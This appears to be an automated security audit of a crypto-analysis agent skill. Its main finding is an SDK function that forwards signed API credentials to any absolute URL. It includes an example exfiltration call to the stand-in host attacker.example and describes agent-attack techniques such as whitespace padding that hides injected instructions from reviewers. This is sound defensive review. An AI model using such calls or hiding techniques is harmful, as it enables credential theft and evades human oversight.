Back to skill

Security audit

valuescan-skill-beta

Security checks for vulnerabilities and agentic risk

Overview

This crypto-analysis skill is coherent but needs Review because its SDK can forward signed API credentials to an arbitrary URL if misused.

Install only if you trust ValueScan and are comfortable providing ValueScan API credentials and sending token, wallet-address, and market-analysis queries to the service. Do not use the included SDK with any user-controlled URL or path until it validates the destination origin, and treat all trading signals as informational rather than financial advice.

Vulnerability Patterns
  • Insecure Skill Coding PracticesFinds exploitable flaws such as hardcoded secrets or command injection
  • Skill Instruction HijackingAlters the agent's session goals or safety constraints when the skill loads
  • Agent Memory PoisoningWrites attacker-controlled rules into memory that affect later sessions
  • Remote Payload Retrieval and ExecutionFetches external code whose behavior can change after review
  • Embedded Malicious CodeShips malicious scripts inside the skill and executes them locally
Findings (1)

T09 · Insecure Skill Coding Practices

Error
Location
script/sdk/vs_api_sign.js:73
Finding

Arbitrary Request Destination Allows API Credential Forwarding

Content
View full analysis

Vulnerability Details

File Location: script/sdk/vs_api_sign.js, lines 73–87
Vulnerability Type: Unvalidated request destination and credential disclosure
Risk Level: High

Vulnerable Code

javascript
async function vsPost(path, data, timeout = 10000) {
    const rawBody = typeof data === 'object' ? JSON.stringify(data) : data;
    const fullUrl = new URL(path, BASE_URL).href;
    const headers = buildSignHeader(rawBody);

    const controller = new AbortController();
    const timeoutId = setTimeout(() => controller.abort(), timeout);

    try {
        const response = await fetch(fullUrl, {
            method: 'POST',
            headers: headers,
            body: rawBody,
            signal: controller.signal
        });

Technical Analysis

The vsPost function treats path as a relative ValueScan API path, but it does not enforce that constraint. JavaScript's new URL(path, BASE_URL) accepts absolute URLs. If path is an absolute URL, it overrides BASE_URL.

The function subsequently calls buildSignHeader(rawBody), which reads the ValueScan credentials from ~/.openclaw/credentials/valuescan.json and produces headers containing X-API-KEY, X-TIMESTAMP, and X-SIGN. These authentication headers are then sent to the destination selected through path.

Although the secret key itself is not transmitted, an attacker-controlled server can receive the API key, signed request data, timestamp, signature, and request body. The flaw violates least-destination and credential-isolation principles.

Attack Path

  1. An attacker influences the value passed to the exported vsPost function, directly or through agent-generated integration code.
  2. The attacker supplies an absolute destination, such as:
    javascript
    vsPost('https://attacker.example/collect', sensitiveRequestData);
    
  3. new URL(path, BASE_URL) resolves to `https://attacker.example/coll ...[truncated 1110 chars]
Remediation
View remediation

Remediation Suggestions

  1. Reject absolute URLs and require a strict relative API path:

    javascript
    if (typeof path !== 'string' || !path.startsWith('/api/open/v1/')) {
        throw new Error('Invalid ValueScan API path');
    }
    
    const base = new URL(BASE_URL);
    const target = new URL(path, base);
    
    if (target.protocol !== 'https:' || target.origin !== base.origin) {
        throw new Error('Untrusted API destination');
    }
    
  2. Validate the destination before calling buildSignHeader, so credentials are not loaded or signatures generated for rejected requests.

  3. Prefer an allowlist of documented endpoint paths rather than accepting arbitrary paths.

  4. Reject scheme-relative paths such as //attacker.example/path, embedded credentials, backslashes, and unexpected URL encodings.

  5. Keep redirects disabled or manually validate every redirect target before forwarding authentication headers. This prevents a trusted endpoint from redirecting signed requests to another origin.

  6. Minimize credential exposure by loading credentials only immediately before a validated request and avoid returning authentication headers to untrusted callers where practical.

  7. Add automated tests covering absolute URLs, scheme-relative URLs, alternate schemes, encoded paths, origin changes, and redirects.

Vulnerability Patterns
  • Prompt InjectionInstruction Override, Hidden Instructions, Exfiltration Commands
  • Data ExfiltrationExternal Transmission, Env Variable Harvesting, File System Enumeration
  • Trigger AbuseOverly Broad Trigger, Shadow Command Trigger, Keyword Baiting Trigger
  • MCP Least PrivilegeUnderdeclared Capability, Wildcard Permission, Missing Permission Declaration
  • MCP Tool PoisoningHidden Instructions, Unicode Deception, Parameter Description Injection
Findings (38)

Tp4

High
Category
MCP Tool Poisoning
Confidence
94% confidence
Finding

The documented behavior does not fully disclose important operational actions: local credential-file access, signed outbound requests, and the fact that the skill is primarily an API wrapper rather than implementing the claimed analytics itself. This mismatch can mislead users and reviewers about what data is accessed and where it is sent, increasing the risk of unintended credential exposure and overtrust in the skill’s analysis.

Content

No source excerpt is available for this finding.

Undeclared Tool Scope

Medium
Category
MCP Least Privilege
Confidence
83% confidence
Finding

The skill declares no explicit tool scope or allowed-tools despite clearly requiring outbound network access to the ValueScan API. In an agent environment, missing capability declarations weakens least-privilege controls and can allow broader-than-expected execution or make review and enforcement harder.

Content

No source excerpt is available for this finding.

Natural-Language Policy Violations

Medium
Category
Not specified by scanner
Confidence
97% confidence
Finding

This markdown file contains user-facing descriptions, examples, and setup instructions exclusively in Chinese, including the manifest description and all operational guidance. Under the policy, forcing a specific language without user opt-in is a natural-language policy violation unless the locale constraint is clearly documented and justified, which is not present here.

Content

No source excerpt is available for this finding.

Whitespace Padding

Medium
Category
Prompt Injection
Confidence
70% confidence
Finding

Large whitespace padding was detected (a block of blank lines or a long run of spaces). This can push injected instructions below or to the right of the visible area so a human reviewer never sees them while the agent still reads them. Manual review of the hidden content is recommended.

Content

Scanner excerpt · SKILL.md (reported line 199)May include surrounding context.

md
## 核心参数

| 参数                 | 说明                                       | 获取方式                                                                                                                                                    |
| ------------------ | ---------------------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------- |
| `vsTokenId`        | 代币唯一标识                                   | 1. 调用 `/vs-token/list` 接口(参数 `search` 传代币符号如 `BTC`);2. 从返回数据的 `id` 字段获取;3. 示例:`{ "id": 1, "symbol": "BTC", "name": "Bitcoin" }` 中 `id=1` 即为 `vsTokenId` |
| `coinKey`          | 链上代币标识(格式: `{symbol}_{contractAddress}`) | 1. 先通过 `vsTokenId` 调用 `/vs-token/detail` 接口;2. 从返回的 `chainAddresses[].coinKey` 获取;3. 示例:`BTC` 返回 `"BTC_BTC"`,`ETH` 返回 `"ETH_0x..."`(原生代币无合约地址)          |

Whitespace Padding

Medium
Category
Prompt Injection
Confidence
70% confidence
Finding

Large whitespace padding was detected (a block of blank lines or a long run of spaces). This can push injected instructions below or to the right of the visible area so a human reviewer never sees them while the agent still reads them. Manual review of the hidden content is recommended.

Content

Scanner excerpt · SKILL.md (reported line 205)May include surrounding context.

md
| `coinKey`          | 链上代币标识(格式: `{symbol}_{contractAddress}`) | 1. 先通过 `vsTokenId` 调用 `/vs-token/detail` 接口;2. 从返回的 `chainAddresses[].coinKey` 获取;3. 示例:`BTC` 返回 `"BTC_BTC"`,`ETH` 返回 `"ETH_0x..."`(原生代币无合约地址)          |
| `address`          | 链上钱包地址                                   | 1. 调用 `持币地址` 接口获取某代币的持币地址列表;2. 或由用户直接提供;3. 格式为区块链标准地址(如 `0x...` 开头的以太坊地址)                                                                               |
| `timeParticleEnum` | 时间粒度编码                                   | 按分析周期选择:`5`=5分钟, `15`=15分钟, `101`=1小时, `104`=4小时, `124`=24小时, `201`=1天, `207`=7天, `230`=30天                                                             |
| `tradeType`        | 交易类型                                     | `1`=现货市场, `2`=合约/永续市场                                                                                                                                   |

### 参数获取示例

Natural-Language Policy Violations

Medium
Category
Not specified by scanner
Confidence
95% confidence
Finding

The manifest description is entirely in Chinese, which indicates the skill is presented in a fixed language without any stated opt-in, language selection, or region-specific justification. Under the policy for natural-language violations, forcing a specific language without user choice is in scope.

Content

No source excerpt is available for this finding.

Missing User Warnings

Medium
Category
Not specified by scanner
Confidence
95% confidence
Finding

This file presents AI-generated 'opportunity token' signals and trading-oriented advice without any warning that outputs may be inaccurate, non-personalized, or financially risky. In a crypto-trading context, users may over-trust the rankings, scores, and advisory text and make loss-inducing decisions, especially because the content frames tokens as having upside potential and includes actionable interpretive guidance.

Content

No source excerpt is available for this finding.

Natural-Language Policy Violations

Medium
Category
Not specified by scanner
Confidence
92% confidence
Finding

This manifest contains user-facing natural-language fields such as name, description, use_case, and field advice entirely in Chinese. Under the policy, forcing a specific language without offering the user a language or locale choice is a natural-language policy violation.

Content

No source excerpt is available for this finding.

Vague Triggers

Medium
Category
Not specified by scanner
Confidence
93% confidence
Finding

The notes define routing triggers using broad natural-language phrases like '异动', '上涨机会', and '看涨代币', which overlap with common user market discussion and can cause the agent to invoke this endpoint too aggressively. In a trading-analysis skill, this increases the chance of misclassification, over-triggering, and presenting speculative 'funds anomaly bullish tokens' output when the user did not explicitly request that analysis.

Content

No source excerpt is available for this finding.

Natural-Language Policy Violations

Medium
Category
Not specified by scanner
Confidence
92% confidence
Finding

This manifest-like JSON uses Chinese for the name, description, field descriptions, advice, and enum labels, but does not indicate that the skill is region-specific or provide any user opt-in for language/locale. Under the policy, forcing a specific language without user choice is a natural-language policy violation.

Content

No source excerpt is available for this finding.

Natural-Language Policy Violations

Medium
Category
Not specified by scanner
Confidence
86% confidence
Finding

This manifest uses Chinese-only natural-language descriptions and advice fields, which effectively forces a specific language without offering the user a choice or documenting that the skill is intended only for a Chinese-language audience. Under the policy, language constraints should be opt-in or clearly justified as region-specific.

Content

No source excerpt is available for this finding.

Natural-Language Policy Violations

Medium
Category
Not specified by scanner
Confidence
90% confidence
Finding

This manifest uses Chinese for the name, description, use case, and parameter descriptions, which effectively forces a specific language experience. The policy allows locale constraints only when they are optional, user-selectable, or clearly justified as region-specific, none of which is stated here.

Content

No source excerpt is available for this finding.

Natural-Language Policy Violations

Medium
Category
Not specified by scanner
Confidence
91% confidence
Finding

This manifest uses Chinese-only natural-language fields for the name, description, use case, and important notes. Under the policy, forcing a specific language without user opt-in or a documented locale-specific justification is a natural-language policy violation.

Content

No source excerpt is available for this finding.

Vague Triggers

Medium
Category
Not specified by scanner
Confidence
82% confidence
Finding

This manifest-style JSON describes the skill's purpose and use cases in broad terms such as tracking address balance changes and monitoring whale activity, but it does not define any explicit trigger phrases, activation boundaries, or exclusion conditions. In manifest files, this can lead to overly broad matching against general requests about balances or address monitoring and unintended invocation.

Content

No source excerpt is available for this finding.

Natural-Language Policy Violations

Medium
Category
Not specified by scanner
Confidence
97% confidence
Finding

The user-facing name, description, and use-case text are entirely in Chinese, which imposes a specific language/locale without indicating user choice or that the skill is intentionally region-specific. Under the policy, language constraints should be optional or explicitly justified.

Content

No source excerpt is available for this finding.

Vague Triggers

Medium
Category
Not specified by scanner
Confidence
83% confidence
Finding

This is a manifest-style JSON file, so vague-trigger review applies. The description and use case explain what the skill does, but they do not define specific activation phrases, scope limits, or negative examples, which can make invocation criteria ambiguous in systems that route based on manifest text.

Content

No source excerpt is available for this finding.

Missing User Warnings

Medium
Category
Not specified by scanner
Confidence
94% confidence
Finding

This manifest documents a remote blockchain query that requires a wallet address, token identifier, coinKey, and time range, but it provides no user-facing notice that these inputs will be transmitted to an external endpoint. Wallet addresses are sensitive from a privacy and profiling perspective because they can be linked to trading behavior and historical activity, so silent transmission can expose users to unwanted tracking or deanonymization.

Content

No source excerpt is available for this finding.

Vague Triggers

Medium
Category
Not specified by scanner
Confidence
90% confidence
Finding

The note says broad natural-language requests like '主力资金趋势等综合语言' should invoke this endpoint, but it does not define clear scope, thresholds, or disambiguation rules. That can cause over-broad or unintended tool invocation, leading the agent to fetch data when the user's intent is ambiguous or only partially related.

Content

No source excerpt is available for this finding.

Vague Triggers

Medium
Category
Not specified by scanner
Confidence
90% confidence
Finding

The notes explicitly say that broad natural-language requests such as '主力分析' or '主力情况' should invoke this endpoint, even when the user has not clearly specified the desired trading type. This can cause overbroad skill activation and retrieval of more data than necessary, increasing the chance of incorrect tool selection, unintended token usage, and misleading financial analysis in a trading context.

Content

No source excerpt is available for this finding.

Natural-Language Policy Violations

Medium
Category
Not specified by scanner
Confidence
90% confidence
Finding

This manifest contains user-facing natural-language fields such as name, description, and use_case exclusively in Chinese. Under the policy, forcing a specific language without user opt-in or a documented regional justification is a natural-language policy violation.

Content

No source excerpt is available for this finding.

Natural-Language Policy Violations

Medium
Category
Not specified by scanner
Confidence
93% confidence
Finding

This manifest contains user-facing natural-language fields such as name, description, use case, parameter descriptions, and response descriptions entirely in Chinese. Because the file does not document that the skill is China/Chinese-specific or offer any language choice, it can violate a language/locale policy requiring opt-in or clear locale justification.

Content

No source excerpt is available for this finding.

Vague Triggers

Medium
Category
Not specified by scanner
Confidence
88% confidence
Finding

The note says that natural-language input about market sentiment can trigger this interface, which is an overly broad invocation rule. Broad triggers can cause the agent to call the skill when the user did not explicitly request this data source, increasing the chance of unnecessary token-authenticated requests, privacy leakage in user prompts, or unintended action chaining with other financial-analysis tools.

Content

No source excerpt is available for this finding.

Natural-Language Policy Violations

Low
Category
Not specified by scanner
Confidence
72% confidence
Finding

All user-facing metadata fields in the manifest are written only in Chinese, with no indication that the skill supports other languages or lets the user choose a locale. Under the language/locale policy, forcing a specific language without opt-in can be a policy concern unless clearly justified as region-specific.

Content

No source excerpt is available for this finding.

Vague Triggers

Low
Category
Not specified by scanner
Confidence
84% confidence
Finding

This JSON manifest-like file describes the interface as a general-purpose '基础接口' for obtaining token IDs and gives behavioral guidance, but it does not define any explicit trigger phrases, invocation boundaries, or exclusion conditions. In manifest-scope review, that lack of specificity can make activation criteria overly broad or ambiguous for when this skill should be used versus other token-related skills.

Content

No source excerpt is available for this finding.

Natural-Language Policy Violations

Low
Category
Not specified by scanner
Confidence
77% confidence
Finding

This manifest-like JSON uses Chinese for most user-facing fields such as name, description, use_case, and enum descriptions, while also mixing in English values like "Payments" and "Metaverse". Because the file provides no indication that language/locale is configurable or intentionally region-specific, it may violate the policy against forcing a specific language without user opt-in.

Content

No source excerpt is available for this finding.

Static analysis

Detected: suspicious.exposed_secret_literal

File appears to expose a hardcoded API secret or token.

Critical
Code
suspicious.exposed_secret_literal
Location
script/sdk/vs_api_sign.js:48